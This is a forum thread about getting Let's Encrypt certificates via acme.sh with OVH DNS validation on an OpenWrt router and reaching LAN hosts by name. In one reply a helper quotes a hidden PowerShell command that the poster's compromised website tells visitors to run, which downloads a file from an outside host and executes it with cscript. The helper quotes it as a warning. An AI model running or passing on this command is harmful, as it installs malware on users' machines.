Acme certificate from OVH on LAN with validation_method dns

acognard · March 25, 2025, 9:14am

Hi all, i am trying to install certificates an i assume i am not easy with the concept.

here is the architecture

Internet			| OpenWrt		| NAS 
xxx.xxx.xxx.xxx  	| 192.168.1.1		| 192.168.1.xxx

website Ovh : domo-tic.com
redirection : loft.domo-tic.com
zone DNS Type A : loft.domo-tic.com

I have upgraded openwrt to last release from scratch, and trying to install acme now after openvpn.

Ports 80/443 are opened

config rule 'wan_https_allow'
	option name 'Allow HTTP, HTTPS from WAN'
	option src 'wan'
	option proto 'tcp'
	option dest_port '80 443'
	option target 'ACCEPT'

steps for installation

# https://openwrt.org/docs/guide-user/services/tls/acmesh
opkg update
opkg install acme acme-acmesh acme-acmesh-dnsapi acme-common
opkg install luci-app-acme luci-ssl-openssl

#https://github.com/acmesh-official/acme.sh/wiki/How-to-run-on-OpenWRT
opkg update
opkg install luci-app-uhttpd

# https://openwrt.org/docs/guide-user/luci/luci.secure#allow_access_from_internet
uci set uhttpd.main.redirect_https=1     # 1 to enable redirect, 0 to disable redirect
uci commit uhttpd
service uhttpd reload

to create api from ovh
https://api.ovh.com/createToken/?GET=/domain/zone/mydomain.com/&POST=/domain/zone/mydomain.com/&PUT=/domain/zone/mydomain.com/&GET=/domain/zone/mydomain.com&DELETE=/domain/zone/mydomain.com/record/

#  cat /etc/config/acme

config acme
        option account_email 'name.surname@xxx.xxx'
        option debug '1'

config cert 'domotic_com'
        option enabled '0'
        option update_uhttpd '0'
        option validation_method 'webroot'
        option staging '0'
        option key_type 'rsa2048'
        list domains '*.domo-tic.com'
        option webroot '/var/run/acme/challenge/'

config cert 'loft_domo_tic_com'
        option enabled '1'
        option validation_method 'dns'
        option staging '0'
        option dns 'dns_ovh'
        list credentials 'OVH_AK="OVH API Application key"'
        list credentials 'OVH_AS="OVH API Application secret"'
        list credentials 'OVH_END_POINT="ovh-eu"'
        list credentials 'OVH_CK="OVH API Application description"'
        option key_type 'rsa2048'
        list domains 'loft.domo-tic.com'

from my computer, running OpenVpn,

List item

first, when accessing to openwrt

List item

second, I use my NAS to aggregate all emails. my client show me a warning when trying to connect using 192.168.1.xxx

What i notice is C=US, maybe here is one of the problem ?

if i run

# /etc/init.d/acme restart

i notice this error : Error, can not get domain token entry *.domo-tic.com for http-01
The supported validation types are: dns-01 , but you specified: http-01

Many thanks for your help agan !
Arnaud

frollic · March 25, 2025, 9:19am

FQDN <> IP address, which is probably what your error message's telling you, but in French.

acognard · March 25, 2025, 9:32am

@frollic , thanks for your response,

ok, the certificate is for loft.domo-tic.com.
il i use OpenVpn (so whithout any port forward), and i want to connect to synology mail server, i suppose to do like that ?

idem for the routeur : https://192.192.1.1 ?

Sincerly.
Arnaud

frollic · March 25, 2025, 9:41am

not sure if you should compare IMAP with HTTPS.

192.168.1.1 isn't the name nor the IP of your mail server, is it ?

OT:
what kind of f-ed up site is domo-tic.com ?

the content of what it tell you to run looks like serious fun, it DLs 500kb of data, and executes it:

cmd /c start /min powershell -Command "$f=Join-Path $env:TEMP 'bop.txt'; curl.exe -s 'https://diab.live/up/' -o $f; Start-Process -WindowStyle Hidden -FilePath 'cscript.exe' -ArgumentList '//E:jscript',$f" #  ✔ ''Action Identificator: 3605''

I would consider my computer compromised after running it.

frollic · March 25, 2025, 10:15am

is exposing your Luci webUI to internet, fix your firewall, you've got VPN.

acognard · March 25, 2025, 10:49am

Done !
It was for a try :).

acognard · March 25, 2025, 10:49am

ouch, it is an old website, i have solved the problem! sorry !!!
Arnaud

acognard · March 25, 2025, 11:12am

sorry sorry for my lack of knowledge.

192.168.1.1 is my router OpenwRT
192.168.1.159 is my synology NAS running mail plus server.

loft.domo-tic.com is the redirection from OVH domo-tic.com to access ton my LAN.

the 2 problems are

acme that seems not working (https://192.168.1.1) with chrome security warning
and accessing to imap server not working on 192.168.1.159

Thank you again
Arnaud

frollic · March 25, 2025, 11:18am

OVH seems to provide VPSes and VMs, are you CGNATed ?

as stated earlier, 192.168.1.1 <> loft.domo-tic.com, you need to access the openwrt router IP using the FQDN.

from where, using what, via what ?

acognard · March 25, 2025, 11:49am

OVH seems to provide VPSes and VMs, are you CGNATed ?
==>i do not understand what you mean by CGNATed

as stated earlier, 192.168.1.1 <> loft.domo-tic.com , you need to access the openwrt router IP using the FQDN.
==>i do not understand

from where , using what , via what ?
==>from WAN using my android or computer via OpenVPN.
==>from LAN using my android or computer.

frollic · March 25, 2025, 11:59am

the cert's for loft.domo-tic.com not 192.168.1.1, using an IP will always generate a warning.

loft.domo-tic.com points to your 109 IP, you should be able to use https://loft.domo-tic.com from any client on the LAN side, assuming the web server certs are configured correctly, and the 109 IP's the one sitting on your router's WAN port.

acognard · March 25, 2025, 12:15pm

that make sense !
But what about the NAS ?

What is this concept accessing 192.xxx via loft:xxxx ? How to ?

Many thakks again for your time.
Arnaud

frollic · March 25, 2025, 12:20pm

technically you shouldn't/can't, since the NAS name isn't loft.domo-tic.com, it can still be done using apache and mod_proxy, acting as the frontend, but I guess we're talking about IMAP here, not HTTPS ?

create a nas.domo-tic.com DNS entry, point it towards 192.168.1.159 in your router's DNS, but the public 109 IP at OVH.
generate a cert for nas.domo-tic.com, or create a *.domo-tic.com cert, and use one cert on all your hosts.

if you really only care about the FQDN on the NAS, simply map 192.168.1.159 to loft.domo-tic.com in openwrt, and you're done.

the cert obviously have to sit on the NAS, not the router.

frollic · March 25, 2025, 1:24pm

OT again
if you use a site like desec.io for your DNS handling, you don't have to open your firewall for the Acme cert verification.

acognard · March 26, 2025, 10:32pm

Dear @frollic , you are so helpfull !

let's say that i have many servers on the LAN, and some VMs (having there own IP on the LAN) et some dockered applications (having also there own LAN IP and some rechable by a 192.168.1.159:xxx).

DynHost is defined on my provider OVh to redirect to loft.domo-tic.com to my (not fixed) IP (which is updated if necessary by OpenWrt using DDNS).

what i understand it is that (without having to forward OpenWRT ports and using OpenVPN ) is to

declare redirections on OVH for each applications like http://myapplication.mydomain.com
or i stay with only one redirection to my LAN like http://myhome.mydomain.com.
or ?

Sorry, but i am really wondering finaly what is the best solution to be able to have a certificates, using OpenVPN, and later having a reverse proxy.

Sincerly.
Arnaud

frollic · March 27, 2025, 4:03pm

If you're exposing them directly to internet without VPN (this is stupid), you have two options.

Unique FQDNs, or loft.domo-tic.com:port+n, then use lighttpd or apache to have a cross reference table with which FQDN or port uses what service on your LAN.

It'd be easier to simply use VPN, then you can access all services directly by a FQDN[:port].